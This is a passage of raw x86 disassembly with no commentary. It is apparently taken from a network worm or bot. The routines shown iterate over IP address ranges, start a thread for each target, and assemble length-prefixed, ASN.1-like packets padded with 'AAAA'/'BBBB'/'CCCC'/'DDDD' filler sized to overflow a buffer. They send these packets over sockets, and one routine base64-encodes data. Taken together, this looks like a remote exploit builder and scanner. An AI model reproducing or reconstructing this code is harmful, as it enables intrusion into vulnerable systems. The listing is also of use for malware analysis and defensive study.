lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B4]
push edi
push eax
push offset sub_40CE00
push edi
push edi
call ds:dword_4F6384 ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40CF67
loc_40CF5C: ; CODE XREF: sub_40CECD+98�j
cmp [ebp+var_C], edi
jnz short loc_40CF67
push 32h
call esi ; Sleep
jmp short loc_40CF5C
; ---------------------------------------------------------------------------
loc_40CF67: ; CODE XREF: sub_40CECD+8D�j
; sub_40CECD+92�j
push [ebp+var_4]
call ds:dword_4F6370 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
lea eax, [ebp+Src]
push 4 ; Size
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_4E4148 ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_4E421C ; htonl
mov [ebp+Dst], eax
lea eax, [ebp+Dst]
push 4 ; Size
push eax ; Src
lea eax, [ebp+Src]
push eax ; Dst
call _memcpy
add esp, 0Ch
jmp loc_40CEFB
sub_40CECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CFBE proc near ; DATA XREF: sub_401CC7+5EB0�o
Dest = byte ptr -130h
var_B0 = dword ptr -0B0h
Str = byte ptr -0ACh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_4F6380
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40CFEC: ; CODE XREF: sub_40CFBE+BC�j
push [ebp+var_2C]
push [ebp+var_1C]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_449B24 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push 1FFh ; Count
push eax ; Source
mov eax, [ebp+var_20]
imul eax, 234h
add eax, offset dword_456F28
push eax ; Dest
call _strncpy
add esp, 1Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_40CE00
push edi
push edi
call ds:dword_4F6384 ; CreateThread
cmp eax, edi
mov [ebp+arg_0], eax
jz short loc_40D058
loc_40D04D: ; CODE XREF: sub_40CFBE+98�j
cmp [ebp+var_8], edi
jnz short loc_40D058
push 32h
call esi ; Sleep
jmp short loc_40D04D
; ---------------------------------------------------------------------------
loc_40D058: ; CODE XREF: sub_40CFBE+8D�j
; sub_40CFBE+92�j
push [ebp+arg_0]
call ds:dword_4F6370 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_28]
jz short loc_40D07F
inc [ebp+var_2C]
jmp loc_40CFEC
; ---------------------------------------------------------------------------
loc_40D07F: ; CODE XREF: sub_40CFBE+B7�j
push [ebp+var_1C]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_449B50 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D6C
push [ebp+var_20]
call sub_40BAAA
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_40CFBE endp
; =============== S U B R O U T I N E =======================================
sub_40D0CB proc near ; CODE XREF: sub_40D36D+E�p
; sub_40D36D+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40D0CB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push dword ptr [ebp+8]
call _strlen
pop ecx
push eax
lea ecx, [ebp-8]
push dword ptr [ebp+8]
call sub_40D103
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
mov eax, esi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40D103(void *Src,size_t Size)
sub_40D103 proc near ; CODE XREF: .text:0040D0ED�p
; sub_40D36D+11E�p
Src = dword ptr 4
Size = dword ptr 8
push ebx
mov ebx, [esp+4+Size]
push esi
push edi
mov esi, ecx
push ebx ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jz short loc_40D135
push ebx ; Size
push 0 ; Val
push edi ; Dst
call _memset
push ebx ; Size
push [esp+1Ch+Src] ; Src
push edi ; Dst
call _memcpy
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40D135: ; CODE XREF: sub_40D103+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40D103 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40D13D(void *Src,size_t Size,int,int)
sub_40D13D proc near ; CODE XREF: sub_40D237+18�p
; sub_40D2B1+16�p ...
Src = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+Size]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi ; Size
call _malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40D189
push edi ; Size
push 0 ; Val
push esi ; Dst
call _memset
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; Dst
call _memcpy
push [ebp+arg_C] ; Size
mov eax, [ebp+Size]
add eax, esi
push [ebp+arg_8] ; Src
push eax ; Dst
call _memcpy
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40D189: ; CODE XREF: sub_40D13D+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_40D13D endp
; =============== S U B R O U T I N E =======================================
sub_40D192 proc near ; CODE XREF: sub_40D237+5E�p
; sub_40D237+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40D1A2
push eax ; Memory
call _free
pop ecx
loc_40D1A2: ; CODE XREF: sub_40D192+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40D192 endp
; =============== S U B R O U T I N E =======================================
sub_40D1AB proc near ; CODE XREF: sub_40D237+20�p
; sub_40D312+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_40D1D8
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40D1DC
loc_40D1D8: ; CODE XREF: sub_40D1AB+D�j
xor al, al
jmp short loc_40D233
; ---------------------------------------------------------------------------
loc_40D1DC: ; CODE XREF: sub_40D1AB+2B�j
mov eax, ebx
add eax, [esi+4]
push eax ; Size
push 0 ; Val
push edi ; Dst
call _memset
add esp, 0Ch
cmp ebx, 1
jnz short loc_40D201
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_40D21B
; ---------------------------------------------------------------------------
loc_40D201: ; CODE XREF: sub_40D1AB+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4] ; Size
lea eax, [edi+3]
push dword ptr [esi] ; Src
loc_40D21B: ; CODE XREF: sub_40D1AB+54�j
push eax ; Dst
call _memcpy
add esp, 0Ch
push dword ptr [esi] ; Memory
call _free
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40D233: ; CODE XREF: sub_40D1AB+2F�j
pop edi
pop esi
pop ebx
retn
sub_40D1AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D237 proc near ; CODE XREF: sub_40D36D+89�p
; sub_40D36D+E3�p ...
Src = dword ptr -8
Size = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+Src]
push dword ptr [esi+4] ; int
push dword ptr [esi] ; int
push 1 ; Size
push offset dword_4E6F54 ; Src
call sub_40D13D
lea ecx, [ebp+Src]
call sub_40D1AB
mov eax, [ebp+Size]
inc eax
push eax ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40D271
xor al, al
jmp short loc_40D2AD
; ---------------------------------------------------------------------------
loc_40D271: ; CODE XREF: sub_40D237+34�j
mov eax, [ebp+Size]
inc eax
push eax ; Size
push 0 ; Val
push edi ; Dst
call _memset
mov byte ptr [edi], 3
push [ebp+Size] ; Size
lea eax, [edi+1]
push [ebp+Src] ; Src
push eax ; Dst
call _memcpy
add esp, 18h
mov ecx, esi
call sub_40D192
mov eax, [ebp+Size]
lea ecx, [ebp+Src]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_40D192
mov al, 1
loc_40D2AD: ; CODE XREF: sub_40D237+38�j
pop edi
pop esi
leave
retn
sub_40D237 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D2B1 proc near ; CODE XREF: sub_40D2E5+14�p
; sub_40D302+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4] ; int
lea ecx, [ebp+var_8]
push [ebp+arg_0] ; int
push dword ptr [esi+4] ; Size
push dword ptr [esi] ; Src
call sub_40D13D
mov ecx, esi
call sub_40D192
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40D2B1 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40D2E5(char *Str)
sub_40D2E5 proc near ; CODE XREF: sub_40D36D+F0�p
; sub_40D36D+15B�p ...
Str = dword ptr 4
push esi
mov esi, ecx
push [esp+4+Str] ; Str
call _strlen
pop ecx
push eax
mov ecx, esi
push [esp+8+Str]
call sub_40D2B1
pop esi
retn 4
sub_40D2E5 endp
; =============== S U B R O U T I N E =======================================
sub_40D302 proc near ; CODE XREF: sub_40D34E+B�p
; sub_40D36D+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40D2B1
retn 8
sub_40D302 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D312 proc near ; CODE XREF: sub_40D34E+16�p
; sub_40D36D+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40D1AB
test al, al
jz short loc_40D34B
push dword ptr [esi+4] ; int
lea ecx, [ebp+var_8]
push dword ptr [esi] ; int
push 1 ; Size
push offset dword_449EE8 ; Src
call sub_40D13D
mov ecx, esi
call sub_40D192
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40D34B: ; CODE XREF: sub_40D312+F�j
pop esi
leave
retn
sub_40D312 endp
; =============== S U B R O U T I N E =======================================
sub_40D34E proc near ; CODE XREF: sub_40D36D+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40D302
test al, al
jz short loc_40D369
mov ecx, esi
call sub_40D312
loc_40D369: ; CODE XREF: sub_40D34E+12�j
pop esi
retn 8
sub_40D34E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D36D proc near ; CODE XREF: sub_40DB44+88�p
Dst = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40D0CB
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_40D6C1
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_40D6C1
push esi
lea ecx, [ebp+var_30]
call sub_40D0CB
lea ecx, [ebp+var_20]
call sub_40D0CB
lea ecx, [ebp+var_50]
call sub_40D0CB
lea ecx, [ebp+var_18]
call sub_40D0CB
lea ecx, [ebp+var_40]
call sub_40D0CB
lea ecx, [ebp+var_38]
call sub_40D0CB
lea ecx, [ebp+var_28]
call sub_40D0CB
push 4
push offset dword_449B88
lea ecx, [ebp+var_30]
call sub_40D2B1
push 3
push offset dword_449B90
lea ecx, [ebp+var_30]
call sub_40D2B1
lea ecx, [ebp+var_30]
call sub_40D237
lea ecx, [ebp+var_30]
call sub_40D312
mov esi, 800h
lea eax, [ebp+Dst]
push esi ; Size
push 42h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_40D2B1
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_40D2B1
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+Dst]
push eax
call sub_40D2B1
lea ecx, [ebp+var_20]
call sub_40D237
push offset dword_449EEC ; Str
lea ecx, [ebp+var_50]
call sub_40D2E5
lea ecx, [ebp+var_50]
call sub_40D237
push esi ; Size
lea eax, [ebp+Dst]
push 44h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
lea ecx, [ebp+var_58]
push 410h ; Size
push eax ; Src
call sub_40D103
lea ecx, [ebp+var_58]
call sub_40D237
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40D34E
lea ecx, [ebp+var_58]
call sub_40D192
push esi ; Size
lea eax, [ebp+Dst]
push 43h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_40D2E5
push 4
push offset dword_449B94
lea ecx, [ebp+var_18]
call sub_40D2B1
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_40D2B1
sub edi, [ebp+arg_8]
lea eax, [ebp+Dst]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_40D2B1
lea ecx, [ebp+var_18]
call sub_40D237
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_40D302
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_40D302
lea ecx, [ebp+var_40]
call sub_40D312
lea ecx, [ebp+var_18]
call sub_40D192
lea ecx, [ebp+var_50]
call sub_40D192
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_40D302
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_40D302
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_40D302
lea ecx, [ebp+var_38]
call sub_40D312
lea ecx, [ebp+var_20]
call sub_40D192
lea ecx, [ebp+var_30]
call sub_40D192
lea ecx, [ebp+var_40]
call sub_40D192
push esi ; Size
lea eax, [ebp+Dst]
push 41h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_40D2B1
lea ecx, [ebp+var_28]
call sub_40D237
push 2
push offset dword_449F00
lea ecx, [ebp+var_28]
call sub_40D2B1
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_40D302
lea ecx, [ebp+var_28]
call sub_40D312
lea ecx, [ebp+var_38]
call sub_40D192
lea ecx, [ebp+var_10]
call sub_40D0CB
lea ecx, [ebp+var_8]
call sub_40D0CB
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_40D302
lea ecx, [ebp+var_10]
call sub_40D1AB
lea ecx, [ebp+var_28]
call sub_40D192
push offset dword_449F04 ; Str
lea ecx, [ebp+var_8]
call sub_40D2E5
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40D302
lea ecx, [ebp+var_8]
call sub_40D1AB
lea ecx, [ebp+var_10]
call sub_40D192
push offset dword_449F08 ; Str
lea ecx, [ebp+var_10]
call sub_40D2E5
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40D302
lea ecx, [ebp+var_10]
call sub_40D1AB
lea ecx, [ebp+var_8]
call sub_40D192
push offset dword_449F0C ; Str
lea ecx, [ebp+var_8]
call sub_40D2E5
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40D302
lea ecx, [ebp+var_8]
call sub_40D1AB
lea ecx, [ebp+var_10]
call sub_40D192
push offset dword_449F18 ; Str
lea ecx, [ebp+var_48]
call sub_40D2E5
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_40D302
lea ecx, [ebp+var_8]
call sub_40D192
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_40D6CF
; ---------------------------------------------------------------------------
loc_40D6C1: ; CODE XREF: sub_40D36D+1B�j
; sub_40D36D+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_40D6CF: ; CODE XREF: sub_40D36D+352�j
pop edi
pop ebx
leave
retn
sub_40D36D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6D3 proc near ; CODE XREF: sub_40D797+A1�p
; sub_40D797+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_4F6578 ; select
cmp eax, edi
jnz short loc_40D73A
lea eax, [ebp+var_10C]
push eax
push esi
call sub_43B892 ; __WSAFDIsSet
test eax, eax
jnz short loc_40D73E
loc_40D73A: ; CODE XREF: sub_40D6D3+54�j
xor eax, eax
jmp short loc_40D74E
; ---------------------------------------------------------------------------
loc_40D73E: ; CODE XREF: sub_40D6D3+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4E4238 ; recv
loc_40D74E: ; CODE XREF: sub_40D6D3+69�j
pop edi
pop esi
leave
retn
sub_40D6D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D752 proc near ; CODE XREF: sub_40D797+81�p
; sub_40D797+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_4E421C ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
cmp eax, 4
jz short loc_40D77C
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D77C: ; CODE XREF: sub_40D752+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4E4270 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40D752 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40D797(int,void *Src,size_t Size)
sub_40D797 proc near ; CODE XREF: sub_40D871+48�p
; sub_40DB44+15B�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+Size]
lea ebx, [edi+41h]
push ebx ; Size
mov [ebp+var_4], ebx
call _malloc
mov esi, eax
pop ecx
test esi, esi
jnz short loc_40D7C0
xor al, al
jmp loc_40D86C
; ---------------------------------------------------------------------------
loc_40D7C0: ; CODE XREF: sub_40D797+20�j
push ebx ; Size
push 0 ; Val
push esi ; Dst
call _memset
push 2Fh ; Size
push offset dword_449C24 ; Src
push esi ; Dst
call _memcpy
push 8 ; Size
lea eax, [esi+31h]
push offset dword_449C54 ; Src
push eax ; Dst
mov [esi+2Fh], di
call _memcpy
push edi ; Size
lea ebx, [esi+3Bh]
push [ebp+Src] ; Src
mov [esi+39h], di
push ebx ; Dst
call _memcpy
push 6 ; Size
add ebx, edi
push offset dword_4E6F4C ; Src
push ebx ; Dst
call _memcpy
mov ebx, [ebp+arg_0]
push 85h
push offset dword_449B9C
push ebx
call sub_40D752
add esp, 48h
test al, al
jnz short loc_40D828
loc_40D824: ; CODE XREF: sub_40D797+B5�j
xor bl, bl
jmp short loc_40D863
; ---------------------------------------------------------------------------
loc_40D828: ; CODE XREF: sub_40D797+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40D6D3
push [ebp+var_4]
push esi
push ebx
call sub_40D752
add esp, 1Ch
test al, al
jz short loc_40D824
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40D6D3
add esp, 10h
mov bl, 1
loc_40D863: ; CODE XREF: sub_40D797+8F�j
push esi ; Memory
call _free
pop ecx
mov al, bl
loc_40D86C: ; CODE XREF: sub_40D797+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D797 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40D871(int,void *Src,size_t Size)
sub_40D871 proc near ; CODE XREF: sub_40DB44+141�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_449C60
push [ebp+arg_0]
call ds:dword_4F6574 ; send
cmp eax, 48h
jnz short loc_40D8AC
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_40D6D3
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40D8AC
cmp [ebp+var_20], 82h
jz short loc_40D8B0
loc_40D8AC: ; CODE XREF: sub_40D871+1B�j
; sub_40D871+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D8B0: ; CODE XREF: sub_40D871+39�j
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+arg_0] ; int
call sub_40D797
add esp, 0Ch
leave
retn
sub_40D871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D8C3 proc near ; CODE XREF: sub_40D90F+29�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_43D468
call __ftol
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_43D460
fstp [esp+10h+var_10]
call _floor
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call __ftol
inc eax
leave
retn
sub_40D8C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D90F proc near ; CODE XREF: sub_40DA86+23�p
var_4C = qword ptr -4Ch
var_38 = byte ptr -38h
var_28 = qword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
mov eax, offset loc_43C78F
call __EH_prolog
sub esp, 2Ch
push esi
lea eax, [ebp+var_D]
push edi
xor esi, esi
push eax
lea ecx, [ebp+var_38]
mov [ebp+var_20], esi
call sub_40DD0B
push 1
pop edi
push [ebp+arg_8]
mov [ebp+var_4], edi
call sub_40D8C3
pop ecx
push eax
lea ecx, [ebp+var_38]
call sub_40DE20
cmp [ebp+arg_8], esi
mov [ebp+var_18], esi
jbe loc_40DA5A
push ebx
mov ebx, [ebp+arg_8]
loc_40D957: ; CODE XREF: sub_40D90F+144�j
cmp [ebp+arg_8], 3
jb short loc_40D962
push 3
loc_40D95F: ; CODE XREF: sub_40D90F+5B�j
pop ebx
jmp short loc_40D973
; ---------------------------------------------------------------------------
loc_40D962: ; CODE XREF: sub_40D90F+4C�j
cmp [ebp+arg_8], 2
jnz short loc_40D96C
push 2
jmp short loc_40D95F
; ---------------------------------------------------------------------------
loc_40D96C: ; CODE XREF: sub_40D90F+57�j
cmp [ebp+arg_8], edi
jnz short loc_40D973
mov ebx, edi
loc_40D973: ; CODE XREF: sub_40D90F+51�j
; sub_40D90F+60�j
and dword ptr [ebp+var_28+4], 0
mov dword ptr [ebp+var_28], ebx
fild [ebp+var_28]
push ecx
push ecx ; double
fmul ds:dbl_43D470
fstp [esp+4Ch+var_4C]
call _ceil
pop ecx
pop ecx
call __ftol
test ebx, ebx
mov [ebp+var_1C], eax
jbe short loc_40D9B4
mov esi, [ebp+arg_4]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp+var_10]
shr ecx, 2
rep movsd
mov ecx, edx
push 1
and ecx, 3
rep movsb
pop edi
loc_40D9B4: ; CODE XREF: sub_40D90F+8A�j
mov cl, [ebp+var_10]
mov dl, [ebp+var_10]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp+var_14], cl
mov cl, [ebp+var_F]
sar cl, 4
and cl, 0Fh
add [ebp+arg_4], ebx
shl dl, 4
add cl, dl
mov dl, [ebp+var_F]
mov [ebp+var_13], cl
mov cl, [ebp+var_E]
sar cl, 6
and dl, 0Fh
sub [ebp+arg_8], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp+var_12], cl
mov cl, [ebp+var_E]
and cl, 3Fh
test eax, eax
mov [ebp+var_11], cl
jbe short loc_40DA21
add [ebp+var_18], eax
loc_40DA06: ; CODE XREF: sub_40D90F+110�j
movsx eax, [ebp+esi+var_14]
lea ecx, [ebp+var_38]
mov al, byte_449CAC[eax]
push eax ; int
push edi ; Size
call sub_40DDA0
inc esi
cmp esi, [ebp+var_1C]
jb short loc_40DA06
loc_40DA21: ; CODE XREF: sub_40D90F+F2�j
cmp [ebp+var_18], 48h
jb short loc_40DA36
push [ebp+Str] ; Str
lea ecx, [ebp+var_38]
call sub_40DD78
and [ebp+var_18], 0
loc_40DA36: ; CODE XREF: sub_40D90F+116�j
push 4
pop esi
cmp [ebp+var_1C], esi
jnb short loc_40DA4F
sub esi, [ebp+var_1C]
loc_40DA41: ; CODE XREF: sub_40D90F+13E�j
push 3Dh ; int
push edi ; Size
lea ecx, [ebp+var_38]
call sub_40DDA0
dec esi
jnz short loc_40DA41
loc_40DA4F: ; CODE XREF: sub_40D90F+12D�j
cmp [ebp+arg_8], 0
ja loc_40D957
pop ebx
loc_40DA5A: ; CODE XREF: sub_40D90F+3E�j
mov ecx, [ebp+arg_0]
lea eax, [ebp+var_38]
push eax
call sub_40DD23
mov [ebp+var_20], edi
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_38]
call sub_40DD70
mov ecx, [ebp+var_C]
mov eax, [ebp+arg_0]
pop edi
pop esi
mov large fs:0, ecx
leave
retn
sub_40D90F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA86 proc near ; CODE XREF: sub_40DB44+124�p
var_1C = byte ptr -1Ch
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
mov eax, offset loc_43C7A9
call __EH_prolog
sub esp, 10h
push ebx
push esi
push edi
push offset dword_4E6F58
and [ebp+var_4], 0
push [ebp+arg_8]
lea eax, [ebp+var_1C]
push [ebp+arg_4]
